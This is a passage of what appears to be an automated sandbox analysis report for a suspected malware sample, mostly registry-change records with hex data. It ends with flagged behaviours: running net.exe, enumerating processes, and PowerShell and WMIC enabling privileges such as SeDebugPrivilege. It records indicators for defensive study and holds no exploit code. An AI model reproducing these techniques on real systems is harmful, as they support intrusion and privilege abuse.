16e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355d95b2000653435366630633931306366316530336637336363643337346662336231336432353233613534613463313762666663646235323666396234643265333035340000b20009000400efbe0355d95b0355d95b2e00000000000000000000000000000000000000000000000000aa7c7800650034003500360066003000630039003100300063006600310065003000330066003700330063006300640033003700340066006200330062003100330064003200350032003300610035003400610034006300310037006200660066006300640062003500320036006600390062003400640032006500330030003500340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000955f02a81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c65343536663063393130636631653033663733636364333734666233623133643235323361353461346331376266666364623532366639623464326533303534000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157ae1548b61ef08ed11b78de670f6038bdabca7cefcc5848241ae2fb45b654f157ae1548b61ef08ed11b78de670f6038bdace000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eafae361-ed19-4d70- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\537bbff6-9f1e-4421- = e868d9802ca7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\269dfa06-9572-4768- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10ee7df4-5ff7-400d- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa158c3c-bf95-4ac3- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c088cdab-3a8c-4c86- = 52fe557f2ca7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\447bb508-04c2-4c88- = d2325f802ca7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eafae361-ed19-4d70- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\537bbff6-9f1e-4421- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\537bbff6-9f1e-4421- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f416a38f-aadb-4940- = d8acf77a2ca7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa158c3c-bf95-4ac3- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000007ac7007b2ca7d8017ac7007b2ca7d8017ac7007b2ca7d801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355d95b2000633033633862643362353930386636633864666665613338663336336437346338656535653230316339616666353437383235366338616139303533666365340000b20009000400efbe0355d95b0355d95b2e0000000000000000000000000000000000000000000000000086098200630030003300630038006200640033006200350039003000380066003600630038006400660066006500610033003800660033003600330064003700340063003800650065003500650032003000310063003900610066006600350034003700380032003500360063003800610061003900300035003300660063006500340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000955f02a81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c63303363386264336235393038663663386466666561333866333633643734633865653565323031633961666635343738323536633861613930353366636534000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157ad8548b61ef08ed11b78de670f6038bdabca7cefcc5848241ae2fb45b654f157ad8548b61ef08ed11b78de670f6038bdace000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5253ac7f-922f-4da2- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000d6f0077b2ca7d801d6f0077b2ca7d801d6f0077b2ca7d801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355d95b2000656532653161376439643366363033636132323164316238343932373330653936363833343361653038656539636463613335663638626138323661336538350000b20009000400efbe0355d95b0355d95b2e000000000000000000000000000000000000000000000000002ae07a00650065003200650031006100370064003900640033006600360030003300630061003200320031006400310062003800340039003200370033003000650039003600360038003300340033006100650030003800650065003900630064006300610033003500660036003800620061003800320036006100330065003800350000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000955f02a81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c65653265316137643964336636303363613232316431623834393237333065393636383334336165303865653963646361333566363862613832366133653835000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157ad9548b61ef08ed11b78de670f6038bdabca7cefcc5848241ae2fb45b654f157ad9548b61ef08ed11b78de670f6038bdace000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- = 3937117b2ca7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\447bb508-04c2-4c88- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\ee2e1a7d9d3f603ca221d1b8492730e9668343ae08ee9cdca35f68ba826a3e85" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5253ac7f-922f-4da2- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\e456f0c910cf1e03f73ccd374fb3b13d2523a54a4c17bffcdb526f9b4d2e3054" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5a1fb410-c912-48d1- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c088cdab-3a8c-4c86- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c088cdab-3a8c-4c86- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\447bb508-04c2-4c88- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\390e91e6-0382-4d16- = 94fb917a2ca7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c088cdab-3a8c-4c86- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000006bfe317c2ca7d8018c80847d2ca7d8018c80847d2ca7d80140f91a000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355d95b2000633033633862643362353930386636633864666665613338663336336437346338656535653230316339616666353437383235366338616139303533666365340000b20009000400efbe0355d95b0355d95b2e0000000000000000000000000000000000000000000000000086098200630030003300630038006200640033006200350039003000380066003600630038006400660066006500610033003800660033003600330064003700340063003800650065003500650032003000310063003900610066006600350034003700380032003500360063003800610061003900300035003300660063006500340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000955f02a81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c63303363386264336235393038663663386466666561333866333633643734633865653565323031633961666635343738323536633861613930353366636534000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157add548b61ef08ed11b78de670f6038bdabca7cefcc5848241ae2fb45b654f157add548b61ef08ed11b78de670f6038bdace000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10ee7df4-5ff7-400d- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\537bbff6-9f1e-4421- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\e456f0c910cf1e03f73ccd374fb3b13d2523a54a4c17bffcdb526f9b4d2e3054" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\447bb508-04c2-4c88- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6bc68a4b-b0ee-4f30- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\390e91e6-0382-4d16- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5a1fb410-c912-48d1- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eafae361-ed19-4d70- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\537bbff6-9f1e-4421- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\390e91e6-0382-4d16- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa158c3c-bf95-4ac3- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
